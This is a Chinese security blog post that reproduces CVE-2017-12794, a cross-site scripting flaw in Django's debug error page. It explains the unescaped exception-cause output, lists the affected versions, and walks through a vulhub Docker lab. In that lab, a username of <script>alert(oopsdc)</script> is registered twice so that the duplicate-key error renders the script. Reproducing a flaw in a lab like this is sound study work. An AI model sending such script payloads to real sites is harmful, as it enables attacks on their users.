<!doctype html><html lang=en dir=auto><head><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name=robots content="index, follow"><title>Django Debug Page XSS CVE-2017-12794漏洞复现 | 0opsdc</title><meta name=keywords content="漏洞复现"><meta name=description content="漏洞原理 若Django项目使用Postgres作为数据库，当触发异常时，psycopg会将字段名及字段值抛出，当字段值中包含可控字符串时，其最后便会在页面中进行显示。
我们可查看1.11.4和1.11.5版本之间django/views/templates/technical_500.html文件的差异：
其差异在于外部关闭了全局转义，并在如图所示处增加了强制转义。若要触发这两个输出点，我们需要进入{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}语句，那么就需要我们判断这段代码所在的功能点，然后精准打击，图中有一串The above exception was the direct cause of the following exception:报错提示，而依据经验的话这是Django中数据库异常抛出的错误语句。
在Django命令行下，当创建一个已存在的用户时，系统会因触发数据库Unique异常而抛出一个IntegrityError异常，其目的在于方便开发者进行SQL错误调试。
查看django/db/utils.py的__exit__函数：
def __exit__(self, exc_type, exc_value, traceback): if exc_type is None: return for dj_exc_type in ( DataError, OperationalError, IntegrityError, InternalError, ProgrammingError, NotSupportedError, DatabaseError, InterfaceError, Error, ): db_exc_type = getattr(self.wrapper.Database, dj_exc_type.__name__) if issubclass(exc_type, db_exc_type): dj_exc_value = dj_exc_type(*exc_value.args) dj_exc_value.__cause__ = exc_value if not hasattr(exc_value, '__traceback__'): exc_value.__traceback__ = traceback # Only set the 'errors_occurred' flag for errors that may make # the connection unusable."><meta name=author content="0opsdc"><link rel=canonical href=https://oopsdc.com/post/django-debug-page-xss-cve-2017-12794%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/><link crossorigin=anonymous href=/assets/css/stylesheet.56b5cc8c8054cf5f30eac4b81af2021f829171098f6e116bb016ed77e3264a36.css integrity="sha256-VrXMjIBUz18w6sS4GvICH4KRcQmPbhFrsBbtd+MmSjY=" rel="preload stylesheet" as=style><script defer crossorigin=anonymous src=/assets/js/highlight.f413e19d0714851f6474e7ee9632408e58ac146fbdbe62747134bea2fa3415e0.js integrity="sha256-9BPhnQcUhR9kdOfuljJAjlisFG+9vmJ0cTS+ovo0FeA=" onload=hljs.initHighlightingOnLoad()></script>
<link rel=icon href=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png><link rel=icon type=image/png sizes=16x16 href=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png><link rel=icon type=image/png sizes=32x32 href=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png><link rel=apple-touch-icon href=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png><link rel=mask-icon href=https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png><meta name=theme-color content="#2e2e33"><meta name=msapplication-TileColor content="#2e2e33"><noscript><style>#theme-toggle,.top-link{display:none}</style><style>@media(prefers-color-scheme:dark){:root{--theme:rgb(29, 30, 32);--entry:rgb(46, 46, 51);--primary:rgb(218, 218, 219);--secondary:rgb(155, 156, 157);--tertiary:rgb(65, 66, 68);--content:rgb(196, 196, 197);--hljs-bg:rgb(46, 46, 51);--code-bg:rgb(55, 56, 62);--border:rgb(51, 51, 51)}.list{background:var(--theme)}.list:not(.dark)::-webkit-scrollbar-track{background:0 0}.list:not(.dark)::-webkit-scrollbar-thumb{border-color:var(--theme)}}</style></noscript><script type=application/javascript>var doNotTrack=!1;doNotTrack||(function(e,t,n,s,o,i,a){e.GoogleAnalyticsObject=o,e[o]=e[o]||function(){(e[o].q=e[o].q||[]).push(arguments)},e[o].l=1*new Date,i=t.createElement(n),a=t.getElementsByTagName(n)[0],i.async=1,i.src=s,a.parentNode.insertBefore(i,a)}(window,document,"script","https://www.google-analytics.com/analytics.js","ga"),ga("create","UA-123-45","auto"),ga("send","pageview"))</script><meta property="og:title" content="Django Debug Page XSS CVE-2017-12794漏洞复现"><meta property="og:description" content="漏洞原理 若Django项目使用Postgres作为数据库，当触发异常时，psycopg会将字段名及字段值抛出，当字段值中包含可控字符串时，其最后便会在页面中进行显示。
我们可查看1.11.4和1.11.5版本之间django/views/templates/technical_500.html文件的差异：
其差异在于外部关闭了全局转义，并在如图所示处增加了强制转义。若要触发这两个输出点，我们需要进入{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}语句，那么就需要我们判断这段代码所在的功能点，然后精准打击，图中有一串The above exception was the direct cause of the following exception:报错提示，而依据经验的话这是Django中数据库异常抛出的错误语句。
在Django命令行下，当创建一个已存在的用户时，系统会因触发数据库Unique异常而抛出一个IntegrityError异常，其目的在于方便开发者进行SQL错误调试。
查看django/db/utils.py的__exit__函数：
def __exit__(self, exc_type, exc_value, traceback): if exc_type is None: return for dj_exc_type in ( DataError, OperationalError, IntegrityError, InternalError, ProgrammingError, NotSupportedError, DatabaseError, InterfaceError, Error, ): db_exc_type = getattr(self.wrapper.Database, dj_exc_type.__name__) if issubclass(exc_type, db_exc_type): dj_exc_value = dj_exc_type(*exc_value.args) dj_exc_value.__cause__ = exc_value if not hasattr(exc_value, '__traceback__'): exc_value.__traceback__ = traceback # Only set the 'errors_occurred' flag for errors that may make # the connection unusable."><meta property="og:type" content="article"><meta property="og:url" content="https://oopsdc.com/post/django-debug-page-xss-cve-2017-12794%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><meta property="og:image" content="https://oopsdc.com/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"><meta property="article:section" content="post"><meta property="article:published_time" content="2022-02-23T17:01:40+08:00"><meta property="article:modified_time" content="2022-02-23T17:01:40+08:00"><meta property="og:site_name" content="0opsdc"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://oopsdc.com/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"><meta name=twitter:title content="Django Debug Page XSS CVE-2017-12794漏洞复现"><meta name=twitter:description content="漏洞原理 若Django项目使用Postgres作为数据库，当触发异常时，psycopg会将字段名及字段值抛出，当字段值中包含可控字符串时，其最后便会在页面中进行显示。
我们可查看1.11.4和1.11.5版本之间django/views/templates/technical_500.html文件的差异：
其差异在于外部关闭了全局转义，并在如图所示处增加了强制转义。若要触发这两个输出点，我们需要进入{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}语句，那么就需要我们判断这段代码所在的功能点，然后精准打击，图中有一串The above exception was the direct cause of the following exception:报错提示，而依据经验的话这是Django中数据库异常抛出的错误语句。
在Django命令行下，当创建一个已存在的用户时，系统会因触发数据库Unique异常而抛出一个IntegrityError异常，其目的在于方便开发者进行SQL错误调试。
查看django/db/utils.py的__exit__函数：
def __exit__(self, exc_type, exc_value, traceback): if exc_type is None: return for dj_exc_type in ( DataError, OperationalError, IntegrityError, InternalError, ProgrammingError, NotSupportedError, DatabaseError, InterfaceError, Error, ): db_exc_type = getattr(self.wrapper.Database, dj_exc_type.__name__) if issubclass(exc_type, db_exc_type): dj_exc_value = dj_exc_type(*exc_value.args) dj_exc_value.__cause__ = exc_value if not hasattr(exc_value, '__traceback__'): exc_value.__traceback__ = traceback # Only set the 'errors_occurred' flag for errors that may make # the connection unusable."><script type=application/ld+json>{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Posts","item":"https://oopsdc.com/post/"},{"@type":"ListItem","position":2,"name":"Django Debug Page XSS CVE-2017-12794漏洞复现","item":"https://oopsdc.com/post/django-debug-page-xss-cve-2017-12794%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"}]}</script><script type=application/ld+json>{"@context":"https://schema.org","@type":"BlogPosting","headline":"Django Debug Page XSS CVE-2017-12794漏洞复现","name":"Django Debug Page XSS CVE-2017-12794漏洞复现","description":"漏洞原理 若Django项目使用Postgres作为数据库，当触发异常时，psycopg会将字段名及字段值抛出，当字段值中包含可控字符串时，其最后便会在页面中进行显示。\n我们可查看1.11.4和1.11.5版本之间django/views/templates/technical_500.html文件的差异：\n其差异在于外部关闭了全局转义，并在如图所示处增加了强制转义。若要触发这两个输出点，我们需要进入{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}语句，那么就需要我们判断这段代码所在的功能点，然后精准打击，图中有一串The above exception was the direct cause of the following exception:报错提示，而依据经验的话这是Django中数据库异常抛出的错误语句。\n在Django命令行下，当创建一个已存在的用户时，系统会因触发数据库Unique异常而抛出一个IntegrityError异常，其目的在于方便开发者进行SQL错误调试。\n查看django/db/utils.py的__exit__函数：\ndef __exit__(self, exc_type, exc_value, traceback): if exc_type is None: return for dj_exc_type in ( DataError, OperationalError, IntegrityError, InternalError, ProgrammingError, NotSupportedError, DatabaseError, InterfaceError, Error, ): db_exc_type = getattr(self.wrapper.Database, dj_exc_type.__name__) if issubclass(exc_type, db_exc_type): dj_exc_value = dj_exc_type(*exc_value.args) dj_exc_value.__cause__ = exc_value if not hasattr(exc_value, \u0026#39;__traceback__\u0026#39;): exc_value.__traceback__ = traceback # Only set the \u0026#39;errors_occurred\u0026#39; flag for errors that may make # the connection unusable.","keywords":["漏洞复现"],"articleBody":"漏洞原理 若Django项目使用Postgres作为数据库，当触发异常时，psycopg会将字段名及字段值抛出，当字段值中包含可控字符串时，其最后便会在页面中进行显示。\n我们可查看1.11.4和1.11.5版本之间django/views/templates/technical_500.html文件的差异：\n其差异在于外部关闭了全局转义，并在如图所示处增加了强制转义。若要触发这两个输出点，我们需要进入{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}语句，那么就需要我们判断这段代码所在的功能点，然后精准打击，图中有一串The above exception was the direct cause of the following exception:报错提示，而依据经验的话这是Django中数据库异常抛出的错误语句。\n在Django命令行下，当创建一个已存在的用户时，系统会因触发数据库Unique异常而抛出一个IntegrityError异常，其目的在于方便开发者进行SQL错误调试。\n查看django/db/utils.py的__exit__函数：\ndef __exit__(self, exc_type, exc_value, traceback): if exc_type is None: return for dj_exc_type in ( DataError, OperationalError, IntegrityError, InternalError, ProgrammingError, NotSupportedError, DatabaseError, InterfaceError, Error, ): db_exc_type = getattr(self.wrapper.Database, dj_exc_type.__name__) if issubclass(exc_type, db_exc_type): dj_exc_value = dj_exc_type(*exc_value.args) dj_exc_value.__cause__ = exc_value if not hasattr(exc_value, '__traceback__'): exc_value.__traceback__ = traceback # Only set the 'errors_occurred' flag for errors that may make # the connection unusable. if dj_exc_type not in (DataError, IntegrityError): self.wrapper.errors_occurred = True six.reraise(dj_exc_type, dj_exc_value, traceback) exc_type是异常，若其类型为DataError，OperationError，IntegrityError，InternalError，ProgrammingError，NotSupportedError，DatabaseError，DatabaseError，InterfaceError，Error之一的话则会抛出一个同类型的新异常，并将__cause__和__traceback__设置为exc_value和traceback，前者是上一个异常的说明，后者是上一个异常的回溯栈。也就是说django/db/utils.py的__exit__函数将上一个异常和当前的新异常进行关联，最后在500页面输出__cause__。\n影响版本 Django 1.10.8之前及Django 1.11.5之前的Django 1.11.x版本。\n漏洞复现 git clone https://github.com/vulhub/vulhub.git cd vulhub/django/CVE-2017-12794 docker-compose up -d 注册用户名为的用户。 再次注册用户。 触发duplicate key异常，触发XSS漏洞。 访问http://:8000/create_user/?username=，页面回显用户创建成功：\nHello, user has been created! 再次访问http://:8000/create_user/?username=，触发异常弹窗。\nPostgre抛出异常为：\nduplicate key value violates unique constraint \"xss_user_username_key\" DETAIL: Key (username)=() already exists. 异常被拼接进The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception并触发XSS。\n文章许可：本文采用CC BY-NC-SA 4.0许可协议，转载请注明出处。\n","wordCount":"149","inLanguage":"en","datePublished":"2022-02-23T17:01:40+08:00","dateModified":"2022-02-23T17:01:40+08:00","author":{"@type":"Person","name":"0opsdc"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://oopsdc.com/post/django-debug-page-xss-cve-2017-12794%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"},"publisher":{"@type":"Organization","name":"0opsdc","logo":{"@type":"ImageObject","url":"https://gitee.com/oopsdc/PicBed/raw/master/oopsdc.tk/favicon.png"}}}</script><script async src=//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js></script><meta name=referrer content="no-referrer-when-downgrade"></head><body id=top><script>localStorage.getItem("pref-theme")==="dark"?document.body.classList.add("dark"):localStorage.getItem("pref-theme")==="light"?document.body.classList.remove("dark"):window.matchMedia("(prefers-color-scheme: dark)").matches&&document.body.classList.add("dark")</script><header class=header><nav class=nav><div class=logo><a href=https://oopsdc.com/ accesskey=h title="Home (Alt + H)">Home</a><div class=logo-switches><button id=theme-toggle accesskey=t title="(Alt + T)"><svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="18" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1111.21 3 7 7 0 0021 12.79z"/></svg><svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="18" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="5"/><line x1="12" y1="1" x2="12" y2="3"/><line x1="12" y1="21" x2="12" y2="23"/><line x1="4.22" y1="4.22" x2="5.64" y2="5.64"/><line x1="18.36" y1="18.36" x2="19.78" y2="19.78"/><line x1="1" y1="12" x2="3" y2="12"/><line x1="21" y1="12" x2="23" y2="12"/><line x1="4.22" y1="19.78" x2="5.64" y2="18.36"/><line x1="18.36" y1="5.64" x2="19.78" y2="4.22"/></svg></button></div></div><ul id=menu><li><a href=https://oopsdc.com/archives/ title=Archives><span>Archives</span></a></li><li><a href=https://oopsdc.com/tags/ title=Tags><span>Tags</span></a></li><li><a href=https://oopsdc.com/search/ title="Search (Alt + /)" accesskey=/><span>Search</span></a></li><li><a href=https://oopsdc.com/about/ title=About><span>About</span></a></li></ul></nav></header><main class=main><article class=post-single><header class=post-header><div class=breadcrumbs><a href=https://oopsdc.com/>Home</a>&nbsp;»&nbsp;<a href=https://oopsdc.com/post/>Posts</a></div><h1 class=post-title>Django Debug Page XSS CVE-2017-12794漏洞复现</h1><div class=post-meta>Created:&nbsp;<span title='2022-02-23 17:01:40 +0800 CST'>2022-02-23</span>&nbsp;·&nbsp;Updated:&nbsp;2022-02-23&nbsp;·&nbsp;0opsdc<div class=meta-item>&nbsp·&nbsp
        <span id=busuanzi_container_page_pv>Article Views: <span id=busuanzi_value_page_pv></span> times</span></div></div></header><aside id=toc-container class="toc-container wide"><div class=toc><details open><summary accesskey=c title="(Alt + C)"><span class=details>Table of Contents</span></summary><div class=inner><ul><li><a href=#%e6%bc%8f%e6%b4%9e%e5%8e%9f%e7%90%86 aria-label=漏洞原理>漏洞原理</a></li><li><a href=#%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac aria-label=影响版本>影响版本</a></li><li><a href=#%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0 aria-label=漏洞复现>漏洞复现</a></li></ul></div></details></div></aside><script>let activeElement,elements;window.addEventListener("DOMContentLoaded",function(){checkTocPosition(),elements=document.querySelectorAll("h1[id],h2[id],h3[id],h4[id],h5[id],h6[id]"),activeElement=elements[0];const t=encodeURI(activeElement.getAttribute("id")).toLowerCase();document.querySelector(`.inner ul li a[href="#${t}"]`).classList.add("active")},!1),window.addEventListener("resize",function(){checkTocPosition()},!1),window.addEventListener("scroll",()=>{activeElement=Array.from(elements).find(e=>{if(getOffsetTop(e)-window.pageYOffset>0&&getOffsetTop(e)-window.pageYOffset<window.innerHeight/2)return e})||activeElement,elements.forEach(e=>{const t=encodeURI(e.getAttribute("id")).toLowerCase();e===activeElement?document.querySelector(`.inner ul li a[href="#${t}"]`).classList.add("active"):document.querySelector(`.inner ul li a[href="#${t}"]`).classList.remove("active")})},!1);const main=parseInt(getComputedStyle(document.body).getPropertyValue("--article-width"),10),toc=parseInt(getComputedStyle(document.body).getPropertyValue("--toc-width"),10),gap=parseInt(getComputedStyle(document.body).getPropertyValue("--gap"),10);function checkTocPosition(){const e=document.body.scrollWidth;e-main-toc*2-gap*4>0?document.getElementById("toc-container").classList.add("wide"):document.getElementById("toc-container").classList.remove("wide")}function getOffsetTop(e){if(!e.getClientRects().length)return 0;let t=e.getBoundingClientRect(),n=e.ownerDocument.defaultView;return t.top+n.pageYOffset}</script><div class=post-content><h1 id=漏洞原理>漏洞原理<a hidden class=anchor aria-hidden=true href=#漏洞原理>#</a></h1><p>若<code>Django</code>项目使用<code>Postgres</code>作为数据库，当触发异常时，<code>psycopg</code>会将字段名及字段值抛出，当字段值中包含可控字符串时，其最后便会在页面中进行显示。</p><p>我们可查看<code>1.11.4</code>和<code>1.11.5</code>版本之间<code>django/views/templates/technical_500.html</code>文件的差异：</p><p><img loading=lazy src=https://cdn.jsdelivr.net/gh/oopsdc/PicBed@main/uPic/xPr9RB.jpg alt=xPr9RB></p><p>其差异在于外部关闭了全局转义，并在如图所示处增加了强制转义。若要触发这两个输出点，我们需要进入<code>{% ifchanged frame.exc_cause %}{% if frame.exc_cause %}</code>语句，那么就需要我们判断这段代码所在的功能点，然后精准打击，图中有一串<code>The above exception was the direct cause of the following exception:</code>报错提示，而依据经验的话这是<code>Django</code>中数据库异常抛出的错误语句。</p><p>在<code>Django</code>命令行下，当创建一个已存在的用户时，系统会因触发数据库<code>Unique</code>异常而抛出一个<code>IntegrityError</code>异常，其目的在于方便开发者进行<code>SQL</code>错误调试。</p><p>查看<code>django/db/utils.py</code>的<code>__exit__</code>函数：</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#66d9ef>def</span> __exit__(self, exc_type, exc_value, traceback):
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>if</span> exc_type <span style=color:#f92672>is</span> <span style=color:#66d9ef>None</span>:
</span></span><span style=display:flex><span>        <span style=color:#66d9ef>return</span>
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>for</span> dj_exc_type <span style=color:#f92672>in</span> (
</span></span><span style=display:flex><span>            DataError,
</span></span><span style=display:flex><span>            OperationalError,
</span></span><span style=display:flex><span>            IntegrityError,
</span></span><span style=display:flex><span>            InternalError,
</span></span><span style=display:flex><span>            ProgrammingError,
</span></span><span style=display:flex><span>            NotSupportedError,
</span></span><span style=display:flex><span>            DatabaseError,
</span></span><span style=display:flex><span>            InterfaceError,
</span></span><span style=display:flex><span>            Error,
</span></span><span style=display:flex><span>    ):
</span></span><span style=display:flex><span>        db_exc_type <span style=color:#f92672>=</span> getattr(self<span style=color:#f92672>.</span>wrapper<span style=color:#f92672>.</span>Database, dj_exc_type<span style=color:#f92672>.</span>__name__)
</span></span><span style=display:flex><span>        <span style=color:#66d9ef>if</span> issubclass(exc_type, db_exc_type):
</span></span><span style=display:flex><span>            dj_exc_value <span style=color:#f92672>=</span> dj_exc_type(<span style=color:#f92672>*</span>exc_value<span style=color:#f92672>.</span>args)
</span></span><span style=display:flex><span>            dj_exc_value<span style=color:#f92672>.</span>__cause__ <span style=color:#f92672>=</span> exc_value
</span></span><span style=display:flex><span>            <span style=color:#66d9ef>if</span> <span style=color:#f92672>not</span> hasattr(exc_value, <span style=color:#e6db74>&#39;__traceback__&#39;</span>):
</span></span><span style=display:flex><span>                exc_value<span style=color:#f92672>.</span>__traceback__ <span style=color:#f92672>=</span> traceback
</span></span><span style=display:flex><span>            <span style=color:#75715e># Only set the &#39;errors_occurred&#39; flag for errors that may make</span>
</span></span><span style=display:flex><span>            <span style=color:#75715e># the connection unusable.</span>
</span></span><span style=display:flex><span>            <span style=color:#66d9ef>if</span> dj_exc_type <span style=color:#f92672>not</span> <span style=color:#f92672>in</span> (DataError, IntegrityError):
</span></span><span style=display:flex><span>                self<span style=color:#f92672>.</span>wrapper<span style=color:#f92672>.</span>errors_occurred <span style=color:#f92672>=</span> <span style=color:#66d9ef>True</span>
</span></span><span style=display:flex><span>            six<span style=color:#f92672>.</span>reraise(dj_exc_type, dj_exc_value, traceback)
</span></span></code></pre></div><p><code>exc_type</code>是异常，若其类型为<code>DataError，OperationError，IntegrityError，InternalError，ProgrammingError，NotSupportedError，DatabaseError，DatabaseError，InterfaceError，Error</code>之一的话则会抛出一个同类型的新异常，并将<code>__cause__</code>和<code>__traceback__</code>设置为<code>exc_value</code>和<code>traceback</code>，前者是上一个异常的说明，后者是上一个异常的回溯栈。也就是说<code>django/db/utils.py</code>的<code>__exit__</code>函数将上一个异常和当前的新异常进行关联，最后在500页面输出<code>__cause__</code>。</p><h1 id=影响版本>影响版本<a hidden class=anchor aria-hidden=true href=#影响版本>#</a></h1><p><code>Django 1.10.8</code>之前及<code>Django 1.11.5</code>之前的<code>Django 1.11.x</code>版本。</p><h1 id=漏洞复现>漏洞复现<a hidden class=anchor aria-hidden=true href=#漏洞复现>#</a></h1><pre tabindex=0><code>git clone https://github.com/vulhub/vulhub.git
cd vulhub/django/CVE-2017-12794
docker-compose up -d
</code></pre><ol><li>注册用户名为<code>&lt;script>alert(oopsdc)&lt;/script></code>的用户。</li><li>再次注册<code>&lt;script>alert(oopsdc)&lt;/script></code>用户。</li><li>触发<code>duplicate key</code>异常，触发<code>XSS</code>漏洞。</li></ol><p>访问<code>http://&lt;ip>:8000/create_user/?username=&lt;script>alert(oopsdc)&lt;/script></code>，页面回显用户创建成功：</p><pre tabindex=0><code>Hello, user has been created!
</code></pre><p>再次访问<code>http://&lt;ip>:8000/create_user/?username=&lt;script>alert(oopsdc)&lt;/script></code>，触发异常弹窗。</p><p><code>Postgre</code>抛出异常为：</p><pre tabindex=0><code>duplicate key value violates unique constraint &#34;xss_user_username_key&#34;

DETAIL:  Key (username)=(&lt;script&gt;alert(oopsdc)&lt;/script&gt;) already exists.
</code></pre><p>异常被拼接进<code>The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception</code>并触发<code>XSS</code>。</p><blockquote><p>文章许可：本文采用<a href=https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh>CC BY-NC-SA 4.0</a>许可协议，转载请注明出处。</p></blockquote></div><footer class=post-footer><ul class=post-tags><li><a href=https://oopsdc.com/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/>漏洞复现</a></li></ul><nav class=paginav><a class=prev href=https://oopsdc.com/post/clash-for-windows-rce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/><span class=title>« Prev</span><br><span>Clash for Windows RCE漏洞复现</span></a>
<a class=next href=https://oopsdc.com/post/discuzx3.4%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%88%A0%E9%99%A4%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/><span class=title>Next »</span><br><span>Discuz!X≤3.4任意文件删除漏洞复现</span></a></nav></footer><div><div class=pagination__title><span class=pagination__title-h style=font-size:20px>Comments</span><hr></div><div id=tcomment></div><script src=https://cdn.staticfile.org/twikoo/1.6.6/twikoo.all.min.js></script>
<script>twikoo.init({envId:"https://twikoo-oopsdc.vercel.app/",el:"#tcomment",path:window.TWIKOO_MAGIC_PATH||window.location.pathname})</script></div></article></main><footer class=footer><div><span id=busuanzi_container_site_pv>Views: <span id=busuanzi_value_site_pv></span></span>
&nbsp;
<span id=busuanzi_container_site_uv>Visitors: <span id=busuanzi_value_site_uv></span></span></div><span>&copy; 2022 <a href=https://oopsdc.com/>0opsdc</a></span>
<span>Powered by
<a href=https://gohugo.io/ rel="noopener noreferrer" target=_blank>Hugo</a> &
        <a href=https://github.com/adityatelange/hugo-PaperMod/ rel=noopener target=_blank>PaperMod</a></span></footer><a href=#top aria-label="go to top" title="Go to Top (Alt + G)" class=top-link id=top-link accesskey=g><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentcolor"><path d="M12 6H0l6-6z"/></svg></a><script>let menu=document.getElementById("menu");menu&&(menu.scrollLeft=localStorage.getItem("menu-scroll-position"),menu.onscroll=function(){localStorage.setItem("menu-scroll-position",menu.scrollLeft)}),document.querySelectorAll('a[href^="#"]').forEach(e=>{e.addEventListener("click",function(e){e.preventDefault();var t=this.getAttribute("href").substr(1);window.matchMedia("(prefers-reduced-motion: reduce)").matches?document.querySelector(`[id='${decodeURIComponent(t)}']`).scrollIntoView():document.querySelector(`[id='${decodeURIComponent(t)}']`).scrollIntoView({behavior:"smooth"}),t==="top"?history.replaceState(null,null," "):history.pushState(null,null,`#${t}`)})})</script><script>var mybutton=document.getElementById("top-link");window.onscroll=function(){document.body.scrollTop>800||document.documentElement.scrollTop>800?(mybutton.style.visibility="visible",mybutton.style.opacity="1"):(mybutton.style.visibility="hidden",mybutton.style.opacity="0")}</script><script>document.getElementById("theme-toggle").addEventListener("click",()=>{document.body.className.includes("dark")?(document.body.classList.remove("dark"),localStorage.setItem("pref-theme","light")):(document.body.classList.add("dark"),localStorage.setItem("pref-theme","dark"))})</script><script>document.querySelectorAll("pre > code").forEach(e=>{const n=e.parentNode.parentNode,t=document.createElement("button");t.classList.add("copy-code"),t.innerHTML="copy";function s(){t.innerHTML="copied!",setTimeout(()=>{t.innerHTML="copy"},2e3)}t.addEventListener("click",t=>{if("clipboard"in navigator){navigator.clipboard.writeText(e.textContent),s();return}const n=document.createRange();n.selectNodeContents(e);const o=window.getSelection();o.removeAllRanges(),o.addRange(n);try{document.execCommand("copy"),s()}catch{}o.removeRange(n)}),n.classList.contains("highlight")?n.appendChild(t):n.parentNode.firstChild==n||(e.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName=="TABLE"?e.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(t):e.parentNode.appendChild(t))})</script></body></html>